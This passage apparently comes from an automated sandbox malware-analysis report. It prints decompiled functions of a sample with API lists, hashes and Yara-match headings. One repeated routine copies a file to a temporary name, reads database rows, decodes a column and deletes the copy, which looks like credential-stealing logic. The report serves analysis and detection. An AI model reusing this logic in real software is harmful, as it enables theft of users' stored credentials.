				E004028E0( &_v68, 0x40);
				_v68 = 0x40;
				 *_t13( &_v68,  *[fs:eax], 0x41660e, _t41, __esi, __ebx, _t39);
				E00406FDC(E00404570(_v60, _v56, 0x100000, 0), _t13,  &_v72, _t38, _t43);
				E0040377C(_t38, _v72);
				_pop(_t36);
				 *[fs:eax] = _t36;
				_push(E00416615);
				return E00403B80( &_v72);
			}













                                                                                                                                                                                          0x00416584
                                                                                                                                                                                          0x0041658e
                                                                                                                                                                                          0x00416591
                                                                                                                                                                                          0x0041659e
                                                                                                                                                                                          0x004165b1
                                                                                                                                                                                          0x004165c2
                                                                                                                                                                                          0x004165c7
                                                                                                                                                                                          0x004165d2
                                                                                                                                                                                          0x004165e9
                                                                                                                                                                                          0x004165f3
                                                                                                                                                                                          0x004165fa
                                                                                                                                                                                          0x004165fd
                                                                                                                                                                                          0x00416600
                                                                                                                                                                                          0x0041660d

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,00000000,0041660E,?,0041B0FC,?), ref: 004165AB
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004165B1
                                                                                                                                                                                            • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressFreeLibraryLoadProcString
                                                                                                                                                                                          • String ID: @$GlobalMemoryStatusEx$kernel32.dll
                                                                                                                                                                                          • API String ID: 923276998-3878206809
                                                                                                                                                                                          • Opcode ID: 85db832d693e486d1a61cee5b690b9a662077cbaa7453f9a7cd2e2dd296e1093
                                                                                                                                                                                          • Instruction ID: ae4c68d41a3a4174a937c26ab83d8f0c6d254553f6270358502c1b43c0ddce29
                                                                                                                                                                                          • Opcode Fuzzy Hash: 85db832d693e486d1a61cee5b690b9a662077cbaa7453f9a7cd2e2dd296e1093
                                                                                                                                                                                          • Instruction Fuzzy Hash: A3018871A002086BD711EBA5DC42E8EB7BDEB88744F61413AF504B32D1E77CAD01855C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406654, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 33%
                                                                                                                                                                                          			E00406654(void* __ecx) {
				signed char _t3;
				signed char _t7;
				intOrPtr* _t8;
				signed char* _t11;

				_t8 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "IsWow64Process");
				_t3 = 0;
				 *_t11 = 0;
				if(_t8 != 0) {
					_push(_t11);
					_push(GetCurrentProcess());
					if( *_t8() == 0 ||  *_t11 == 0) {
						_t7 = 0;
					} else {
						_t7 = 1;
					}
					_t3 =  ~_t7;
					asm("sbb eax, eax");
					 *_t11 = _t3;
				}
				asm("sbb eax, eax");
				return _t3 + 1;
			}







                                                                                                                                                                                          0x0040666b
                                                                                                                                                                                          0x0040666d
                                                                                                                                                                                          0x0040666f
                                                                                                                                                                                          0x00406674
                                                                                                                                                                                          0x00406676
                                                                                                                                                                                          0x0040667c
                                                                                                                                                                                          0x00406681
                                                                                                                                                                                          0x00406689
                                                                                                                                                                                          0x0040668d
                                                                                                                                                                                          0x0040668d
                                                                                                                                                                                          0x0040668d
                                                                                                                                                                                          0x0040668f
                                                                                                                                                                                          0x00406691
                                                                                                                                                                                          0x00406693
                                                                                                                                                                                          0x00406693
                                                                                                                                                                                          0x0040669a
                                                                                                                                                                                          0x0040669f

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process,?,?,004066D4,?,00417330,00000000,004175F4,?,Windows : ,?,,?,EXE_PATH : ,?), ref: 00406660
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00406666
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,kernel32.dll,IsWow64Process,?,?,004066D4,?,00417330,00000000,004175F4,?,Windows : ,?,,?), ref: 00406677
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressCurrentHandleModuleProcProcess
                                                                                                                                                                                          • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                          • API String ID: 4190356694-3024904723
                                                                                                                                                                                          • Opcode ID: bb90ac27b46476fccc6d3856fb06f30bc2750b404d13dc0022771fe07b4660df
                                                                                                                                                                                          • Instruction ID: ba80d2391f81007aa42feea1da534082dc1adbf3711fe3d895332dec38dcedd5
                                                                                                                                                                                          • Opcode Fuzzy Hash: bb90ac27b46476fccc6d3856fb06f30bc2750b404d13dc0022771fe07b4660df
                                                                                                                                                                                          • Instruction Fuzzy Hash: B0E06DB12143019EEB007EB58881A3B21C89B44305F130E3EA496F21C1E97EC8A0866D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00410E58, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 47%
                                                                                                                                                                                          			E00410E58(signed int __eax, void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				intOrPtr _v117;
				signed int _t70;
				signed int _t71;
				WCHAR* _t91;
				intOrPtr* _t106;
				intOrPtr _t108;
				intOrPtr* _t110;
				intOrPtr* _t114;
				intOrPtr* _t151;
				intOrPtr _t153;
				intOrPtr* _t155;
				void* _t157;
				intOrPtr* _t159;
				intOrPtr* _t163;
				void* _t165;
				intOrPtr* _t170;
				intOrPtr* _t176;
				intOrPtr* _t182;
				void* _t184;
				intOrPtr* _t188;
				void* _t192;
				intOrPtr _t213;
				intOrPtr _t215;
				void* _t221;
				intOrPtr _t227;
				intOrPtr _t231;
				intOrPtr _t232;
				void* _t233;
				void* _t234;

				_t229 = __esi;
				_t190 = __ebx;
				_pop(_t232);
				 *__eax =  *__eax + __eax;
				 *((intOrPtr*)(__edx)) =  *((intOrPtr*)(__edx)) + __eax;
				 *__eax =  *__eax + __eax;
				 *__ecx =  *__ecx + __ecx;
				 *__eax =  *__eax | __eax;
				 *__eax =  *__eax + __eax;
				_t70 = __eax;
				 *_t70 =  *_t70 + _t70;
				_t71 = _t70 | 0x00000a00;
				 *_t71 =  *_t71 + _t71;
				_v117 = _v117 + __edx;
				_t231 = _t232;
				_t192 = 0xb;
				do {
					_push(0);
					_push(0);
					_t192 = _t192 - 1;
					_t242 = _t192;
				} while (_t192 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = _t71;
				E004040F4( &_v8);
				_push(_t231);
				_push(0x411163);
				_push( *[fs:eax]);
				 *[fs:eax] = _t232;
				E00403B80( &_v28);
				_push(_t231);
				_push(0x4110ce);
				_push( *[fs:eax]);
				 *[fs:eax] = _t232;
				E00406FDC(GetTickCount(), __ebx,  &_v52, __esi, _t242);
				_push(_v52);
				E00406F1C( &_v56, __ebx, __edi, __esi, _t242);
				_push(_v56);
				_push(L".tmp");
				E00403E1C();
				E0040781C(_v8, _t190,  &_v40, _t242);
				E004062D8(L"%TEMP%",  &_v64, _t242);
				_push(_v64);
				_push(0x41119c);
				_push(_v32);
				E00403E1C();
				E0040781C(_v60, _t190,  &_v44, _t242);
				_t91 = E00403D3C(_v44);
				CopyFileW(E00403D3C(_v40), _t91, 0xffffffff);
				E0040377C( &_v68, _v44);
				E00404AFC(_v68, _t190, _t192,  &_v36, _t229, _t242);
				E00403D2C( &_v72, _v36);
				if(E004076B0(_v72, _t190, _t192) != 0) {
					_t106 =  *0x41b55c; // 0x41c784
					_t108 =  *((intOrPtr*)( *_t106))(E00403990(_v36),  &_v16);
					_t233 = _t232 + 8;
					__eflags = _t108;
					if(_t108 == 0) {
						E00408120(0x66,  &_v76);
						_t151 =  *0x41b5cc; // 0x41c78c
						_t153 =  *((intOrPtr*)( *_t151))(_v16, E00403990(_v76), 0xffffffff,  &_v20,  &_v24);
						_t234 = _t233 + 0x14;
						__eflags = _t153;
						if(_t153 == 0) {
							while(1) {
								_t155 =  *0x41b600; // 0x41c790
								_t157 =  *((intOrPtr*)( *_t155))(_v20);
								__eflags = _t157 - 0x64;
								if(_t157 != 0x64) {
									goto L12;
								}
								_t159 =  *0x41b644; // 0x41c798
								_t163 =  *0x41b588; // 0x41c794
								_t165 =  *((intOrPtr*)( *_t163))(_v20, 3,  *((intOrPtr*)( *_t159))(_v20, 3));
								_pop(_t221);
								E004094C4(_t165,  &_v48, _t221);
								E00403D2C( &_v80, _v48);
								_t170 =  *0x41b588; // 0x41c794
								E00403C98( &_v84,  *((intOrPtr*)( *_t170))(_v20, 0, 0x4111a4, _v80, _v28));
								_t176 =  *0x41b588; // 0x41c794
								E00403C98( &_v88,  *((intOrPtr*)( *_t176))(_v20, 1, 0x4111a4, _v84));
								_t182 =  *0x41b588; // 0x41c794
								_t184 =  *((intOrPtr*)( *_t182))(_v20, 2, 0x4111b0, _v88);
								_t234 = _t234 + 0x28;
								E00403C98( &_v92, _t184);
								_push(_v92);
								_push(L"\r\n\r\n");
								E00403E1C();
								_t188 =  *0x41b584; // 0x41b0b4
								 *_t188 =  *_t188 + 1;
								__eflags =  *_t188;
							}
						}
					}
					L12:
					_t110 =  *0x41b654; // 0x41c79c
					 *((intOrPtr*)( *_t110))(_v20);
					_t114 =  *0x41b590; // 0x41c788
					 *((intOrPtr*)( *_t114))(_v16);
					_pop(_t213);
					 *[fs:eax] = _t213;
					E00403BBC(_v12, _v28);
					DeleteFileW(E00403D3C(_v44));
				} else {
					_pop(_t227);
					 *[fs:eax] = _t227;
				}
				_pop(_t215);
				 *[fs:eax] = _t215;
				_push(E0041116A);
				E00403B98( &_v92, 4);
				E004034E4( &_v76);
				E00403B80( &_v72);
				E004034E4( &_v68);
				E00403B98( &_v64, 4);
				E004034E4( &_v48);
				E00403B98( &_v44, 2);
				E004034E4( &_v36);
				E00403B98( &_v32, 2);
				return E00403B80( &_v8);
			}






















































                                                                                                                                                                                          0x00410e58
                                                                                                                                                                                          0x00410e58
                                                                                                                                                                                          0x00410e58
                                                                                                                                                                                          0x00410e59
                                                                                                                                                                                          0x00410e5b
                                                                                                                                                                                          0x00410e5d
                                                                                                                                                                                          0x00410e5f
                                                                                                                                                                                          0x00410e60
                                                                                                                                                                                          0x00410e62
                                                                                                                                                                                          0x00410e64
                                                                                                                                                                                          0x00410e66
                                                                                                                                                                                          0x00410e68
                                                                                                                                                                                          0x00410e6d
                                                                                                                                                                                          0x00410e6f
                                                                                                                                                                                          0x00410e71
                                                                                                                                                                                          0x00410e73
                                                                                                                                                                                          0x00410e78
                                                                                                                                                                                          0x00410e78
                                                                                                                                                                                          0x00410e7a
                                                                                                                                                                                          0x00410e7c
                                                                                                                                                                                          0x00410e7c
                                                                                                                                                                                          0x00410e7c
                                                                                                                                                                                          0x00410e7f
                                                                                                                                                                                          0x00410e80
                                                                                                                                                                                          0x00410e81
                                                                                                                                                                                          0x00410e82
                                                                                                                                                                                          0x00410e85
                                                                                                                                                                                          0x00410e8b
                                                                                                                                                                                          0x00410e92
                                                                                                                                                                                          0x00410e93
                                                                                                                                                                                          0x00410e98
                                                                                                                                                                                          0x00410e9b
                                                                                                                                                                                          0x00410ea1
                                                                                                                                                                                          0x00410ea8
                                                                                                                                                                                          0x00410ea9
                                                                                                                                                                                          0x00410eae
                                                                                                                                                                                          0x00410eb1
                                                                                                                                                                                          0x00410ebc
                                                                                                                                                                                          0x00410ec1
                                                                                                                                                                                          0x00410ec7
                                                                                                                                                                                          0x00410ecc
                                                                                                                                                                                          0x00410ecf
                                                                                                                                                                                          0x00410edc
                                                                                                                                                                                          0x00410ee7
                                                                                                                                                                                          0x00410ef4
                                                                                                                                                                                          0x00410ef9
                                                                                                                                                                                          0x00410efc
                                                                                                                                                                                          0x00410f01
                                                                                                                                                                                          0x00410f0c
                                                                                                                                                                                          0x00410f17
                                                                                                                                                                                          0x00410f21
                                                                                                                                                                                          0x00410f30
                                                                                                                                                                                          0x00410f3b
                                                                                                                                                                                          0x00410f46
                                                                                                                                                                                          0x00410f51
                                                                                                                                                                                          0x00410f60
                                                                                                                                                                                          0x00410f7c
                                                                                                                                                                                          0x00410f83
                                                                                                                                                                                          0x00410f85
                                                                                                                                                                                          0x00410f88
                                                                                                                                                                                          0x00410f8a
                                                                                                                                                                                          0x00410fa2
                                                                                                                                                                                          0x00410fb4
                                                                                                                                                                                          0x00410fbb
                                                                                                                                                                                          0x00410fbd
                                                                                                                                                                                          0x00410fc0
                                                                                                                                                                                          0x00410fc2
                                                                                                                                                                                          0x00411091
                                                                                                                                                                                          0x00411095
                                                                                                                                                                                          0x0041109c
                                                                                                                                                                                          0x0041109f
                                                                                                                                                                                          0x004110a2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00410fd3
                                                                                                                                                                                          0x00410fe6
                                                                                                                                                                                          0x00410fed
                                                                                                                                                                                          0x00410ff5
                                                                                                                                                                                          0x00410ff6
                                                                                                                                                                                          0x00411004
                                                                                                                                                                                          0x00411017
                                                                                                                                                                                          0x00411028
                                                                                                                                                                                          0x0041103b
                                                                                                                                                                                          0x0041104c
                                                                                                                                                                                          0x0041105f
                                                                                                                                                                                          0x00411066
                                                                                                                                                                                          0x00411068
                                                                                                                                                                                          0x00411070
                                                                                                                                                                                          0x00411075
                                                                                                                                                                                          0x00411078
                                                                                                                                                                                          0x00411085
                                                                                                                                                                                          0x0041108a
                                                                                                                                                                                          0x0041108f
                                                                                                                                                                                          0x0041108f
                                                                                                                                                                                          0x0041108f
                                                                                                                                                                                          0x00411091
                                                                                                                                                                                          0x00410fc2
                                                                                                                                                                                          0x004110a8
                                                                                                                                                                                          0x004110ac
                                                                                                                                                                                          0x004110b3
                                                                                                                                                                                          0x004110ba
                                                                                                                                                                                          0x004110c1
                                                                                                                                                                                          0x004110c6
                                                                                                                                                                                          0x004110c9
                                                                                                                                                                                          0x004110de
                                                                                                                                                                                          0x004110ec
                                                                                                                                                                                          0x00410f62
                                                                                                                                                                                          0x00410f64
                                                                                                                                                                                          0x00410f67
                                                                                                                                                                                          0x00410f67
                                                                                                                                                                                          0x004110f3
                                                                                                                                                                                          0x004110f6
                                                                                                                                                                                          0x004110f9
                                                                                                                                                                                          0x00411106
                                                                                                                                                                                          0x0041110e
                                                                                                                                                                                          0x00411116
                                                                                                                                                                                          0x0041111e
                                                                                                                                                                                          0x0041112b
                                                                                                                                                                                          0x00411133
                                                                                                                                                                                          0x00411140
                                                                                                                                                                                          0x00411148
                                                                                                                                                                                          0x00411155
                                                                                                                                                                                          0x00411162

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00410EB4
                                                                                                                                                                                          • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CopyCountFileTick
                                                                                                                                                                                          • String ID: %TEMP%$.tmp
                                                                                                                                                                                          • API String ID: 3448371392-3650661790
                                                                                                                                                                                          • Opcode ID: dcbd54fc4c37fa41d1f3def047f476980ec269fdbcef2be5238ae35c760609eb
                                                                                                                                                                                          • Instruction ID: 0e4f139da3bc19c2096e57fedbffea1b6a0c7ee0d64fc6893e7b5a554fe936bc
                                                                                                                                                                                          • Opcode Fuzzy Hash: dcbd54fc4c37fa41d1f3def047f476980ec269fdbcef2be5238ae35c760609eb
                                                                                                                                                                                          • Instruction Fuzzy Hash: D0411F31904249AEDB01EBA1D852ACDBF79EF49308F50447BF500B76A3D67CAE458A58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00410E60, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 116fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 47%
                                                                                                                                                                                          			E00410E60(signed int __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				intOrPtr _v117;
				signed int _t70;
				signed int _t71;
				WCHAR* _t91;
				intOrPtr* _t106;
				intOrPtr _t108;
				intOrPtr* _t110;
				intOrPtr* _t114;
				intOrPtr* _t151;
				intOrPtr _t153;
				intOrPtr* _t155;
				void* _t157;
				intOrPtr* _t159;
				intOrPtr* _t163;
				void* _t165;
				intOrPtr* _t170;
				intOrPtr* _t176;
				intOrPtr* _t182;
				void* _t184;
				intOrPtr* _t188;
				void* _t191;
				intOrPtr _t212;
				intOrPtr _t214;
				void* _t220;
				intOrPtr _t226;
				intOrPtr _t230;
				intOrPtr _t231;
				void* _t232;
				void* _t233;

				_t228 = __esi;
				_t190 = __ebx;
				 *__eax =  *__eax | __eax;
				 *__eax =  *__eax + __eax;
				_t70 = __eax;
				 *_t70 =  *_t70 + _t70;
				_t71 = _t70 | 0x00000a00;
				 *_t71 =  *_t71 + _t71;
				_v117 = _v117 + __edx;
				_t230 = _t231;
				_t191 = 0xb;
				do {
					_push(0);
					_push(0);
					_t191 = _t191 - 1;
					_t240 = _t191;
				} while (_t191 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = _t71;
				E004040F4( &_v8);
				_push(_t230);
				_push(0x411163);
				_push( *[fs:eax]);
				 *[fs:eax] = _t231;
				E00403B80( &_v28);
				_push(_t230);
				_push(0x4110ce);
				_push( *[fs:eax]);
				 *[fs:eax] = _t231;
				E00406FDC(GetTickCount(), __ebx,  &_v52, __esi, _t240);
				_push(_v52);
				E00406F1C( &_v56, __ebx, __edi, __esi, _t240);
				_push(_v56);
				_push(L".tmp");
				E00403E1C();
				E0040781C(_v8, _t190,  &_v40, _t240);
				E004062D8(L"%TEMP%",  &_v64, _t240);
				_push(_v64);
				_push(0x41119c);
				_push(_v32);
				E00403E1C();
				E0040781C(_v60, _t190,  &_v44, _t240);
				_t91 = E00403D3C(_v44);
				CopyFileW(E00403D3C(_v40), _t91, 0xffffffff);
				E0040377C( &_v68, _v44);
				E00404AFC(_v68, _t190, _t191,  &_v36, _t228, _t240);
				E00403D2C( &_v72, _v36);
				if(E004076B0(_v72, _t190, _t191) != 0) {
					_t106 =  *0x41b55c; // 0x41c784
					_t108 =  *((intOrPtr*)( *_t106))(E00403990(_v36),  &_v16);
					_t232 = _t231 + 8;
					__eflags = _t108;
					if(_t108 == 0) {
						E00408120(0x66,  &_v76);
						_t151 =  *0x41b5cc; // 0x41c78c
						_t153 =  *((intOrPtr*)( *_t151))(_v16, E00403990(_v76), 0xffffffff,  &_v20,  &_v24);
						_t233 = _t232 + 0x14;
						__eflags = _t153;
						if(_t153 == 0) {
							while(1) {
								_t155 =  *0x41b600; // 0x41c790
								_t157 =  *((intOrPtr*)( *_t155))(_v20);
								__eflags = _t157 - 0x64;
								if(_t157 != 0x64) {
									goto L11;
								}
								_t159 =  *0x41b644; // 0x41c798
								_t163 =  *0x41b588; // 0x41c794
								_t165 =  *((intOrPtr*)( *_t163))(_v20, 3,  *((intOrPtr*)( *_t159))(_v20, 3));
								_pop(_t220);
								E004094C4(_t165,  &_v48, _t220);
								E00403D2C( &_v80, _v48);
								_t170 =  *0x41b588; // 0x41c794
								E00403C98( &_v84,  *((intOrPtr*)( *_t170))(_v20, 0, 0x4111a4, _v80, _v28));
								_t176 =  *0x41b588; // 0x41c794
								E00403C98( &_v88,  *((intOrPtr*)( *_t176))(_v20, 1, 0x4111a4, _v84));
								_t182 =  *0x41b588; // 0x41c794
								_t184 =  *((intOrPtr*)( *_t182))(_v20, 2, 0x4111b0, _v88);
								_t233 = _t233 + 0x28;
								E00403C98( &_v92, _t184);
								_push(_v92);
								_push(L"\r\n\r\n");
								E00403E1C();
								_t188 =  *0x41b584; // 0x41b0b4
								 *_t188 =  *_t188 + 1;
								__eflags =  *_t188;
							}
						}
					}
					L11:
					_t110 =  *0x41b654; // 0x41c79c
					 *((intOrPtr*)( *_t110))(_v20);
					_t114 =  *0x41b590; // 0x41c788
					 *((intOrPtr*)( *_t114))(_v16);
					_pop(_t212);
					 *[fs:eax] = _t212;
					E00403BBC(_v12, _v28);
					DeleteFileW(E00403D3C(_v44));
				} else {
					_pop(_t226);
					 *[fs:eax] = _t226;
				}
				_pop(_t214);
				 *[fs:eax] = _t214;
				_push(E0041116A);
				E00403B98( &_v92, 4);
				E004034E4( &_v76);
				E00403B80( &_v72);
				E004034E4( &_v68);
				E00403B98( &_v64, 4);
				E004034E4( &_v48);
				E00403B98( &_v44, 2);
				E004034E4( &_v36);
				E00403B98( &_v32, 2);
				return E00403B80( &_v8);
			}






















































                                                                                                                                                                                          0x00410e60
                                                                                                                                                                                          0x00410e60
                                                                                                                                                                                          0x00410e60
                                                                                                                                                                                          0x00410e62
                                                                                                                                                                                          0x00410e64
                                                                                                                                                                                          0x00410e66
                                                                                                                                                                                          0x00410e68
                                                                                                                                                                                          0x00410e6d
                                                                                                                                                                                          0x00410e6f
                                                                                                                                                                                          0x00410e71
                                                                                                                                                                                          0x00410e73
                                                                                                                                                                                          0x00410e78
                                                                                                                                                                                          0x00410e78
                                                                                                                                                                                          0x00410e7a
                                                                                                                                                                                          0x00410e7c
                                                                                                                                                                                          0x00410e7c
                                                                                                                                                                                          0x00410e7c
                                                                                                                                                                                          0x00410e7f
                                                                                                                                                                                          0x00410e80
                                                                                                                                                                                          0x00410e81
                                                                                                                                                                                          0x00410e82
                                                                                                                                                                                          0x00410e85
                                                                                                                                                                                          0x00410e8b
                                                                                                                                                                                          0x00410e92
                                                                                                                                                                                          0x00410e93
                                                                                                                                                                                          0x00410e98
                                                                                                                                                                                          0x00410e9b
                                                                                                                                                                                          0x00410ea1
                                                                                                                                                                                          0x00410ea8
                                                                                                                                                                                          0x00410ea9
                                                                                                                                                                                          0x00410eae
                                                                                                                                                                                          0x00410eb1
                                                                                                                                                                                          0x00410ebc
                                                                                                                                                                                          0x00410ec1
                                                                                                                                                                                          0x00410ec7
                                                                                                                                                                                          0x00410ecc
                                                                                                                                                                                          0x00410ecf
                                                                                                                                                                                          0x00410edc
                                                                                                                                                                                          0x00410ee7
                                                                                                                                                                                          0x00410ef4
                                                                                                                                                                                          0x00410ef9
                                                                                                                                                                                          0x00410efc
                                                                                                                                                                                          0x00410f01
                                                                                                                                                                                          0x00410f0c
                                                                                                                                                                                          0x00410f17
                                                                                                                                                                                          0x00410f21
                                                                                                                                                                                          0x00410f30
                                                                                                                                                                                          0x00410f3b
                                                                                                                                                                                          0x00410f46
                                                                                                                                                                                          0x00410f51
                                                                                                                                                                                          0x00410f60
                                                                                                                                                                                          0x00410f7c
                                                                                                                                                                                          0x00410f83
                                                                                                                                                                                          0x00410f85
                                                                                                                                                                                          0x00410f88
                                                                                                                                                                                          0x00410f8a
                                                                                                                                                                                          0x00410fa2
                                                                                                                                                                                          0x00410fb4
                                                                                                                                                                                          0x00410fbb
                                                                                                                                                                                          0x00410fbd
                                                                                                                                                                                          0x00410fc0
                                                                                                                                                                                          0x00410fc2
                                                                                                                                                                                          0x00411091
                                                                                                                                                                                          0x00411095
                                                                                                                                                                                          0x0041109c
                                                                                                                                                                                          0x0041109f
                                                                                                                                                                                          0x004110a2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00410fd3
                                                                                                                                                                                          0x00410fe6
                                                                                                                                                                                          0x00410fed
                                                                                                                                                                                          0x00410ff5
                                                                                                                                                                                          0x00410ff6
                                                                                                                                                                                          0x00411004
                                                                                                                                                                                          0x00411017
                                                                                                                                                                                          0x00411028
                                                                                                                                                                                          0x0041103b
                                                                                                                                                                                          0x0041104c
                                                                                                                                                                                          0x0041105f
                                                                                                                                                                                          0x00411066
                                                                                                                                                                                          0x00411068
                                                                                                                                                                                          0x00411070
                                                                                                                                                                                          0x00411075
                                                                                                                                                                                          0x00411078
                                                                                                                                                                                          0x00411085
                                                                                                                                                                                          0x0041108a
                                                                                                                                                                                          0x0041108f
                                                                                                                                                                                          0x0041108f
                                                                                                                                                                                          0x0041108f
                                                                                                                                                                                          0x00411091
                                                                                                                                                                                          0x00410fc2
                                                                                                                                                                                          0x004110a8
                                                                                                                                                                                          0x004110ac
                                                                                                                                                                                          0x004110b3
                                                                                                                                                                                          0x004110ba
                                                                                                                                                                                          0x004110c1
                                                                                                                                                                                          0x004110c6
                                                                                                                                                                                          0x004110c9
                                                                                                                                                                                          0x004110de
                                                                                                                                                                                          0x004110ec
                                                                                                                                                                                          0x00410f62
                                                                                                                                                                                          0x00410f64
                                                                                                                                                                                          0x00410f67
                                                                                                                                                                                          0x00410f67
                                                                                                                                                                                          0x004110f3
                                                                                                                                                                                          0x004110f6
                                                                                                                                                                                          0x004110f9
                                                                                                                                                                                          0x00411106
                                                                                                                                                                                          0x0041110e
                                                                                                                                                                                          0x00411116
                                                                                                                                                                                          0x0041111e
                                                                                                                                                                                          0x0041112b
                                                                                                                                                                                          0x00411133
                                                                                                                                                                                          0x00411140
                                                                                                                                                                                          0x00411148
                                                                                                                                                                                          0x00411155
                                                                                                                                                                                          0x00411162

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00410EB4
                                                                                                                                                                                          • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CopyCountFileTick
                                                                                                                                                                                          • String ID: %TEMP%$.tmp
                                                                                                                                                                                          • API String ID: 3448371392-3650661790
                                                                                                                                                                                          • Opcode ID: b4051c86d89d16cbdd011401cb26392d540c890b59df4c5f9e00e45593a2b883
                                                                                                                                                                                          • Instruction ID: 2c73a4ceecea9b7a55c8e1441bd033eb3759b1d2195d340dd4b2e4f4f6784083
                                                                                                                                                                                          • Opcode Fuzzy Hash: b4051c86d89d16cbdd011401cb26392d540c890b59df4c5f9e00e45593a2b883
                                                                                                                                                                                          • Instruction Fuzzy Hash: DF412131904149AFDB01FFA1D842ACDBBB9EF49318F50447BF500B36A2D67CAE458A58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00410E68, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 46%
                                                                                                                                                                                          			E00410E68(signed int __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				intOrPtr _v117;
				signed int _t70;
				WCHAR* _t90;
				intOrPtr* _t105;
				intOrPtr _t107;
				intOrPtr* _t109;
				intOrPtr* _t113;
				intOrPtr* _t150;
				intOrPtr _t152;
				intOrPtr* _t154;
				void* _t156;
				intOrPtr* _t158;
				intOrPtr* _t162;
				void* _t164;
				intOrPtr* _t169;
				intOrPtr* _t175;
				intOrPtr* _t181;
				void* _t183;
				intOrPtr* _t187;
				void* _t190;
				intOrPtr _t211;
				intOrPtr _t213;
				void* _t219;
				intOrPtr _t225;
				intOrPtr _t229;
				intOrPtr _t230;
				void* _t231;
				void* _t232;

				_t227 = __esi;
				_t189 = __ebx;
				_t70 = __eax | 0x00000a00;
				 *_t70 =  *_t70 + _t70;
				_v117 = _v117 + __edx;
				_t229 = _t230;
				_t190 = 0xb;
				do {
					_push(0);
					_push(0);
					_t190 = _t190 - 1;
					_t238 = _t190;
				} while (_t190 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = _t70;
